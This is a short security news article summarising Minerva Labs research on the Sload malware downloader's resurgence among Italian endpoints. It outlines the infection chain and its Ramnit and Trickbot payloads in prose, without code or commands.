Minerva Labs researchers reported a comeback of Sload, a notorious malware downloader. This year, they say, Sload infections are coming from Italian endpoints.
Sload is a type of computer virus that collects and exfiltrates information from the infected device and can drop additional payloads on behalf of its operator. It is considered one of the most dangerous types of malware in recent years. A downloader will deliver additional malware only if the target has been deemed financially attractive.
Sload has been targeting victims mostly in Europe since at least 2018, with the majority of reported attacks occurring in the UK and Italy.
Instead of using an executable or a document to infiltrate machines, Sload’s developers use Windows native scripts – VBS and PowerShell – and using spear-phishing tactics they try to trick users into executing them.
The downloader is an ever-developing project, the first stage script of which has been continuously updated, while the main module remains largely unchanged.
Minerva Labs explains that the infection chain begins by downloading a PowerShell script with help of a rogue LNK file. The PowerShell script is then launched to download and execute Sload. Later variants rely on WSF/VBS scripts.
Minerva Labs has seen Sload infections from Italian endpoints increasing significantly over the past year.
The initial script used in these attacks repeatedly scores low on the VirusTotal score and is designed to bypass security tools such as an EDR. Researchers encountered an obfuscated WSF script that can covertly download and run a remote payload. The trick works by renaming legitimate Windows binaries “bitsadmin.exe” and “Powershell.exe”, after which the PowerShell script gets loaded to memory and starts its execution.
This downloader’s final payloads were reported to drop Ramnit and Trickbot banking trojans which can collect a large amount of data from users and even lead to ransomware attacks.